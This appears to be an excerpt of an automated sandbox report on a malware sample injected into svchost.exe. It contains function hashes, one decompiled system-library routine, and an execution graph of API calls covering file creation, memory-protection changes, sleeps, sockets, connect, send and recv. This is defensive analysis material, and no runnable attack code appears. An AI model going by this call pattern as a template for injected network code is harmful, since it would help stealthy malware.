                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d4ed27caf60b9ae23297b390b2c14cf58818140b93f7433dc20fde5e2b3d61b
                                          • Instruction ID: a9fc6155008adfc8b8dafebdc126c424f0fc4bc2a53d6e0dfe7a8c9223a356a0
                                          • Opcode Fuzzy Hash: 1d4ed27caf60b9ae23297b390b2c14cf58818140b93f7433dc20fde5e2b3d61b
                                          • Instruction Fuzzy Hash: 079002A121104442E104A169484870610459BE1241F51C013A2145554CC6698C616175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69950 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5760dc7bfd5da528ec9ba7ef8f09bd94e2fdd92d9489b7a188a4ab2708a3c7d8
                                          • Instruction ID: 91f060c3e9b44cd6f02835c25825f5ed1bdda54d3b36da342a1a208b4954270a
                                          • Opcode Fuzzy Hash: 5760dc7bfd5da528ec9ba7ef8f09bd94e2fdd92d9489b7a188a4ab2708a3c7d8
                                          • Instruction Fuzzy Hash: D89002A120144803E140A5694C4860710059BD0342F51C012A2055555E8B698C517175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A698A0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41e1950a127fdd17b82582483f2b4763c0b235ee3d0110e5c465728bd629f9ab
                                          • Instruction ID: 73a7402960cd7b0b6a78fbef4c0f4be31a09dac2cd57bb3d9e853d69f6808852
                                          • Opcode Fuzzy Hash: 41e1950a127fdd17b82582483f2b4763c0b235ee3d0110e5c465728bd629f9ab
                                          • Instruction Fuzzy Hash: 5990026130104802E102A16948586061009DBD1385F91C013E1415555D87658953B172
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69820 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6aba9cada98199a23d7ec505108db5edc2bac2c50f1c8034f8923c383e71977c
                                          • Instruction ID: 34af1a5f644e9842d8231eba81385ecb4881ea57b5ec344b7ef5b47ac747aa87
                                          • Opcode Fuzzy Hash: 6aba9cada98199a23d7ec505108db5edc2bac2c50f1c8034f8923c383e71977c
                                          • Instruction Fuzzy Hash: 8290027124104802E141B16948486061009ABD0281F91C013A0415554E87958A56BAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A6B040 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d6ad9dd648485c0cf6c091a615dc1bbc2541c67f8bdc47f2dbea57390030466
                                          • Instruction ID: c738ec072a63d68835c29f5ad8216b7b4fe249218287ebb8f5720a2c6fe4b440
                                          • Opcode Fuzzy Hash: 9d6ad9dd648485c0cf6c091a615dc1bbc2541c67f8bdc47f2dbea57390030466
                                          • Instruction Fuzzy Hash: E19002A1601184435540F1694C484066015ABE1341391C122A0445560C87A88855A2B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69FE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47cabe9beb6f0f75bd3e69228cef066dbc8b7d87f1c88c530658f61884000802
                                          • Instruction ID: f2774c55b48b9a38da34e1ac1cf7d2138abb8305384d87e44f330a99da8cda9c
                                          • Opcode Fuzzy Hash: 47cabe9beb6f0f75bd3e69228cef066dbc8b7d87f1c88c530658f61884000802
                                          • Instruction Fuzzy Hash: F990027131118802E110A169884870610059BD1241F51C412A0815558D87D588917172
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69730 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6441f7b6a86e2bb1007b8082db21182f5f5653647193909ade7cb64d43e7ede7
                                          • Instruction ID: bcd99209f8660f0ff19debab996bd1d48adf558db4b5b8cf936fe7fc518c609a
                                          • Opcode Fuzzy Hash: 6441f7b6a86e2bb1007b8082db21182f5f5653647193909ade7cb64d43e7ede7
                                          • Instruction Fuzzy Hash: EF90026160504802E140B169585C70610159BD0241F51D012A0015554DC7998A5576F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A6A710 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb4127e4003f2402c670be022adefb2a513f1b5218ca3e758e25a26398b4e5d1
                                          • Instruction ID: c6c2bedf4c55b4dd6e7e7422e18cc28522d45a227a00b353fa2c578c707d2f2b
                                          • Opcode Fuzzy Hash: cb4127e4003f2402c670be022adefb2a513f1b5218ca3e758e25a26398b4e5d1
                                          • Instruction Fuzzy Hash: 9E90027130104452A500E6A95C48A4A51059BF0341B51D016A4005554C869488616171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69760 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c37453b249a2008031278b8186d6339c69129c8bac17334a4581fb7454b73b9
                                          • Instruction ID: 0303879f81bd560580627f4981e87a5d9f5e6aae144821400bd3ea1f5c2265f1
                                          • Opcode Fuzzy Hash: 3c37453b249a2008031278b8186d6339c69129c8bac17334a4581fb7454b73b9
                                          • Instruction Fuzzy Hash: D490027120104803E100A169594C70710059BD0241F51D412A0415558DD79688517171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69770 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eb4e11747f8bb6cb30979b84ee4fde638f5d28ed5d82cf3dc45d1459526adacf
                                          • Instruction ID: a16543e92309e572e79ce545dea6167d15692be5b3f0bf91de30c33d08006999
                                          • Opcode Fuzzy Hash: eb4e11747f8bb6cb30979b84ee4fde638f5d28ed5d82cf3dc45d1459526adacf
                                          • Instruction Fuzzy Hash: 7A90026120508842E100A569584CA0610059BD0245F51D012A1055595DC7758851B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A6A770 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 412bf472b7d62ca849afd19f04ae523ddc34cea5a2c3774a1827d30c6f18e5d9
                                          • Instruction ID: 10a36bfffe732cc25f4bf23cb0a7c87a1e6cf7f341130e7428bff04ad049691d
                                          • Opcode Fuzzy Hash: 412bf472b7d62ca849afd19f04ae523ddc34cea5a2c3774a1827d30c6f18e5d9
                                          • Instruction Fuzzy Hash: ED90027520508842E500A5695C48A8710059BD0345F51D412A041559CD87948861B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A696D0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82622223433b67fce28f4c033bf12a47ddb3d44c5eb65a59c9cdaa71dc9754ae
                                          • Instruction ID: 6ff9a4705a91f3839911f737f38d9dd811fbaf85ed41eb05eb16ec106d33f042
                                          • Opcode Fuzzy Hash: 82622223433b67fce28f4c033bf12a47ddb3d44c5eb65a59c9cdaa71dc9754ae
                                          • Instruction Fuzzy Hash: 5E90027120104C42E100A1694848B4610059BE0341F51C017A0115654D8755C8517571
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69610 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2520134985e488057dd23f46cf02852e1da7293e18b0fcb7b23f3bc7782f0853
                                          • Instruction ID: 5c135866b855b091c1143838d55e60bbcb98d066ce69f2508eff8c73fa40c93f
                                          • Opcode Fuzzy Hash: 2520134985e488057dd23f46cf02852e1da7293e18b0fcb7b23f3bc7782f0853
                                          • Instruction Fuzzy Hash: 5D90027160504C02E150B169485874610059BD0341F51C012A0015654D87958A5576F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69650 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e44633f42fcdd6a4de9db0c8784d91024bcae3f438ad9aaf330290cb4cde492
                                          • Instruction ID: 48497deafb2b1905aadacf880c48d9ddb83953f91b294848b700f0a41c9db37b
                                          • Opcode Fuzzy Hash: 5e44633f42fcdd6a4de9db0c8784d91024bcae3f438ad9aaf330290cb4cde492
                                          • Instruction Fuzzy Hash: E290027120508C42E140B1694848A4610159BD0345F51C012A0055694D97658D55B6B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A695F0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8342da5f29ff071be7025437b41679673e4b9224d392ac016f292028dbb17de
                                          • Instruction ID: f4cddcbe4791223df93f826f5f08a7cfd7edb3b890e29921fc90e3dbaae6cf12
                                          • Opcode Fuzzy Hash: f8342da5f29ff071be7025437b41679673e4b9224d392ac016f292028dbb17de
                                          • Instruction Fuzzy Hash: C390027120104C02E104A1694C4868610059BD0341F51C012A6015655E97A588917171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a11647c61db32eb5446418afaf9b4af8bd83cbaf99ab1654e094ba3286c10cb
                                          • Instruction ID: 54c7708647574ef9035ca0c71c5b098243b6d0b0258f4057ec4bb1eec4b6a1a5
                                          • Opcode Fuzzy Hash: 5a11647c61db32eb5446418afaf9b4af8bd83cbaf99ab1654e094ba3286c10cb
                                          • Instruction Fuzzy Hash: 769002E1201184925500E2698848B0A55059BE0241B51C017E1045560CC6658851A175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A6AD30 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8adeaf3c23e19ae78a1fb444326797db43d6f23065316fa589705b0a1e398f14
                                          • Instruction ID: 68b153db91d1b2a4d3bdad9687d4f3753fb80617a6a57b38bd442975e51db447
                                          • Opcode Fuzzy Hash: 8adeaf3c23e19ae78a1fb444326797db43d6f23065316fa589705b0a1e398f14
                                          • Instruction Fuzzy Hash: 48900271A0504412A140B1694C586465006ABE0781B55C012A0505554C8A948A5563F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69560 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c476c2ec71882eae65c7327f9752b9933331a5422e6aa8672219b7f6ca39d8af
                                          • Instruction ID: 646b1c0c16456c702ca5741cd99e3745f1e8a5b82328c486c4373be1db519a30
                                          • Opcode Fuzzy Hash: c476c2ec71882eae65c7327f9752b9933331a5422e6aa8672219b7f6ca39d8af
                                          • Instruction Fuzzy Hash: D4900265221044021145E5690A4850B1445ABD6391391C016F1407590CC76188656371
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 62e131053f4e80967e378ebabb360d6f5250f32fa291e0b485be7a4cb643aaff
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03ABFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E03ABFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E03A6CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03AB5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03AB5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                          0x03abfdda
                                          0x03abfde2
                                          0x03abfde5
                                          0x03abfdec
                                          0x03abfdfa
                                          0x03abfdff
                                          0x03abfe0a
                                          0x03abfe0f
                                          0x03abfe17
                                          0x03abfe1e
                                          0x03abfe19
                                          0x03abfe19
                                          0x03abfe19
                                          0x03abfe20
                                          0x03abfe21
                                          0x03abfe22
                                          0x03abfe25
                                          0x03abfe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03ABFDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03ABFE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03ABFE01
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 8c234fc9c07d516d75c7599d19e282778e14fca37d09166cd029fb5c16fd4be4
                                          • Instruction ID: a4843125a9ce4946c374dc1e76af55a1342276d23a806ab14c9c45447ecf41d8
                                          • Opcode Fuzzy Hash: 8c234fc9c07d516d75c7599d19e282778e14fca37d09166cd029fb5c16fd4be4
                                          • Instruction Fuzzy Hash: 03F028366002007FD6205A45CC01F63BB6EEB41730F140216F624495D2D962F87082A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:4.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:4.6%
                                          Total number of Nodes:457
                                          Total number of Limit Nodes:17
                                          execution_graph 7134 754ecd4 7136 754ecd8 7134->7136 7135 754f022 7136->7135 7140 754e352 7136->7140 7138 754ef0d 7138->7135 7149 754e792 7138->7149 7142 754e39e 7140->7142 7141 754e58e 7141->7138 7142->7141 7143 754e4ec 7142->7143 7145 754e595 7142->7145 7144 7554232 NtCreateFile 7143->7144 7147 754e4ff 7144->7147 7145->7141 7146 7554232 NtCreateFile 7145->7146 7146->7141 7147->7141 7148 7554232 NtCreateFile 7147->7148 7148->7141 7150 754e7e0 7149->7150 7151 7554232 NtCreateFile 7150->7151 7155 754e90c 7151->7155 7152 754eaf3 7152->7138 7153 754e352 NtCreateFile 7153->7155 7154 754e602 NtCreateFile 7154->7155 7155->7152 7155->7153 7155->7154 6768 7555e12 6772 7554942 6768->6772 6770 7555e45 NtProtectVirtualMemory 6771 7555e70 6770->6771 6773 7554967 6772->6773 6773->6770 7092 754a613 7094 754a620 7092->7094 7093 754a684 7094->7093 7095 7555e12 NtProtectVirtualMemory 7094->7095 7095->7094 6802 75492dd 6805 754931a 6802->6805 6803 75493fa 6804 7549328 SleepEx 6804->6804 6804->6805 6805->6803 6805->6804 6809 7553f12 6805->6809 6818 754a432 6805->6818 6828 75490f2 6805->6828 6810 7553f48 6809->6810 6815 7554134 6810->6815 6816 7554232 NtCreateFile 6810->6816 6817 75540e9 6810->6817 6834 7554f82 6810->6834 6811 7554125 6854 7553922 6811->6854 6815->6805 6816->6810 6817->6811 6846 7553842 6817->6846 6819 754a45b 6818->6819 6826 754a4c9 6818->6826 6820 7554232 NtCreateFile 6819->6820 6819->6826 6821 754a496 6820->6821 6822 754a4c5 6821->6822 6866 754a082 6821->6866 6824 7554232 NtCreateFile 6822->6824 6822->6826 6824->6826 6825 754a4b6 6825->6822 6875 7549f52 6825->6875 6826->6805 6829 75491d3 6828->6829 6830 7549109 6828->6830 6829->6805 6880 7549012 6830->6880 6832 7549113 6832->6829 6833 7554f82 6 API calls 6832->6833 6833->6829 6835 7554fb8 6834->6835 6836 75515b2 socket 6835->6836 6837 7555081 6835->6837 6845 7555022 6835->6845 6836->6837 6838 7555134 6837->6838 6840 7555117 getaddrinfo 6837->6840 6837->6845 6839 7551732 connect 6838->6839 6844 75551b2 6838->6844 6838->6845 6839->6844 6840->6838 6841 75516b2 send 6843 7555729 6841->6843 6842 75557f4 setsockopt recv 6842->6845 6843->6842 6843->6845 6844->6841 6844->6845 6845->6810 6847 755386d 6846->6847 6862 7554232 6847->6862 6849 7553906 6849->6817 6850 7553888 6850->6849 6851 7554f82 6 API calls 6850->6851 6852 75538c5 6850->6852 6851->6852 6852->6849 6853 7554232 NtCreateFile 6852->6853 6853->6849 6855 75539c2 6854->6855 6856 7554232 NtCreateFile 6855->6856 6857 75539d6 6856->6857 6858 7553a9f 6857->6858 6860 7554f82 6 API calls 6857->6860 6861 7553a5d 6857->6861 6858->6815 6859 7554232 NtCreateFile 6859->6858 6860->6861 6861->6858 6861->6859 6863 755425c 6862->6863 6865 7554334 6862->6865 6864 7554410 NtCreateFile 6863->6864 6863->6865 6864->6865 6865->6850 6867 754a420 6866->6867 6868 754a0aa 6866->6868 6867->6825 6868->6867 6869 7554232 NtCreateFile 6868->6869 6871 754a1f9 6869->6871 6870 754a3df 6870->6825 6871->6870 6872 7554232 NtCreateFile 6871->6872 6873 754a3c9 6872->6873 6874 7554232 NtCreateFile 6873->6874 6874->6870 6876 7549f70 6875->6876 6877 7549f84 6875->6877 6876->6822 6878 7554232 NtCreateFile 6877->6878 6879 754a046 6878->6879 6879->6822 6881 7549031 6880->6881 6882 75490cd 6881->6882 6883 7554f82 6 API calls 6881->6883 6882->6832 6883->6882 7156 754cedd 7158 754cf06 7156->7158 7157 754cfa4 7158->7157 7159 75498f2 NtProtectVirtualMemory 7158->7159 7160 754cf9c 7159->7160 7161 7550382 2 API calls 7160->7161 7161->7157 7096 7556a1f 7097 7556a25 7096->7097 7100 754a5f2 7097->7100 7099 7556a3d 7101 754a60e 7100->7101 7102 754a5fb 7100->7102 7101->7099 7102->7101 7103 754f662 6 API calls 7102->7103 7103->7101 7162 754cdd9 7163 754cdf0 7162->7163 7164 7550382 2 API calls 7163->7164 7165 754cecd 7163->7165 7164->7165 6781 7554f82 6782 7554fb8 6781->6782 6784 7555081 6782->6784 6792 7555022 6782->6792 6793 75515b2 6782->6793 6785 7555134 6784->6785 6787 7555117 getaddrinfo 6784->6787 6784->6792 6791 75551b2 6785->6791 6785->6792 6796 7551732 6785->6796 6787->6785 6789 75557f4 setsockopt recv 6789->6792 6790 7555729 6790->6789 6790->6792 6791->6792 6799 75516b2 6791->6799 6794 75515ec 6793->6794 6795 755160a socket 6793->6795 6794->6795 6795->6784 6797 7551788 connect 6796->6797 6798 755176a 6796->6798 6797->6791 6798->6797 6800 7551705 send 6799->6800 6801 75516e7 6799->6801 6800->6790 6801->6800 7035 7556a4d 7036 7556a53 7035->7036 7039 754a782 7036->7039 7038 7556a6b 7041 754a78f 7039->7041 7040 754a7ad 7040->7038 7041->7040 7043 754f662 7041->7043 7044 754f66b 7043->7044 7050 754f7ba 7043->7050 7045 75490f2 6 API calls 7044->7045 7044->7050 7047 754f6ee 7045->7047 7046 754f750 7049 754f83f 7046->7049 7046->7050 7051 754f791 7046->7051 7047->7046 7048 7554f82 6 API calls 7047->7048 7048->7046 7049->7050 7052 7554f82 6 API calls 7049->7052 7050->7040 7051->7050 7053 7554f82 6 API calls 7051->7053 7052->7050 7053->7050 7054 754e14a 7055 754e153 7054->7055 7060 754e174 7054->7060 7056 7550382 2 API calls 7055->7056 7058 754e16c 7056->7058 7057 754e1e7 7059 75490f2 6 API calls 7058->7059 7059->7060 7060->7057 7062 75491f2 7060->7062 7063 75492c9 7062->7063 7064 754920f 7062->7064 7063->7060 7065 7553f12 7 API calls 7064->7065 7067 7549242 7064->7067 7065->7067 7066 7549289 7066->7063 7069 75490f2 6 API calls 7066->7069 7067->7066 7068 754a432 NtCreateFile 7067->7068 7068->7066 7069->7063 7104 7555e0a 7105 7555e45 NtProtectVirtualMemory 7104->7105 7106 7554942 7104->7106 7107 7555e70 7105->7107 7106->7105 7166 754d2f4 7169 754d349 7166->7169 7167 754d49f 7168 75498f2 NtProtectVirtualMemory 7167->7168 7173 754d4c3 7167->7173 7168->7173 7169->7167 7170 75498f2 NtProtectVirtualMemory 7169->7170 7171 754d480 7170->7171 7172 75498f2 NtProtectVirtualMemory 7171->7172 7172->7167 7174 75498f2 NtProtectVirtualMemory 7173->7174 7175 754d597 7173->7175 7174->7175 7176 75498f2 NtProtectVirtualMemory 7175->7176 7177 754d5bf 7175->7177 7176->7177 7181 75498f2 NtProtectVirtualMemory 7177->7181 7182 754d6b9 7177->7182 7178 754d6e1 7179 7550382 2 API calls 7178->7179 7180 754d6e9 7179->7180 7181->7182 7182->7178 7183 75498f2 NtProtectVirtualMemory 7182->7183 7183->7178 7184 75569f1 7185 75569f7 7184->7185 7188 754b852 7185->7188 7187 7556a0f 7189 754b8e4 7188->7189 7190 754b865 7188->7190 7189->7187 7190->7189 7192 754b887 7190->7192 7194 754b87e 7190->7194 7191 755136f 7191->7187 7192->7189 7193 754f662 6 API calls 7192->7193 7193->7189 7194->7191 7196 75510c2 7194->7196 7197 75510cb 7196->7197 7199 75511f0 7196->7199 7198 7554f82 6 API calls 7197->7198 7197->7199 7198->7199 7199->7191 7200 754a5f1 7201 754a606 7200->7201 7202 754a60e 7200->7202 7203 754f662 6 API calls 7201->7203 7203->7202 7204 75490f1 7205 7549109 7204->7205 7207 75491d3 7204->7207 7206 7549012 6 API calls 7205->7206 7208 7549113 7206->7208 7208->7207 7209 7554f82 6 API calls 7208->7209 7209->7207 7230 75569b3 7231 75569bd 7230->7231 7234 754b6d2 7231->7234 7233 75569e0 7235 754b704 7234->7235 7236 754b6f7 7234->7236 7238 754b6ff 7235->7238 7239 754b72d 7235->7239 7241 754b737 7235->7241 7237 75490f2 6 API calls 7236->7237 7237->7238 7238->7233 7243 75512c2 7239->7243 7241->7238 7242 7554f82 6 API calls 7241->7242 7242->7238 7244 75512df 7243->7244 7245 75512cb 7243->7245 7244->7238 7245->7244 7246 75510c2 6 API calls 7245->7246 7246->7244 6777 7554232 6778 755425c 6777->6778 6780 7554334 6777->6780 6779 7554410 NtCreateFile 6778->6779 6778->6780 6779->6780 7247 754f8be 7248 754f8c3 7247->7248 7249 754f9a6 7248->7249 7250 754f995 ObtainUserAgentString 7248->7250 7250->7249 7070 755037e 7071 75503c7 7070->7071 7072 7550232 ObtainUserAgentString 7071->7072 7073 7550438 7072->7073 7074 7551632 WSAStartup 7073->7074 7075 7550e7b 7074->7075 7251 754cfbf 7252 754d016 7251->7252 7255 754d0bb 7252->7255 7256 754d0f0 7252->7256 7257 75498f2 NtProtectVirtualMemory 7252->7257 7253 754d0e8 7254 7550382 2 API calls 7253->7254 7254->7256 7255->7253 7258 75498f2 NtProtectVirtualMemory 7255->7258 7257->7255 7258->7253 7259 75510b9 7260 75510ed 7259->7260 7262 75511f0 7259->7262 7261 7554f82 6 API calls 7260->7261 7260->7262 7261->7262 7076 7554f7a 7078 7554fb8 7076->7078 7077 7555022 7078->7077 7079 75515b2 socket 7078->7079 7080 7555081 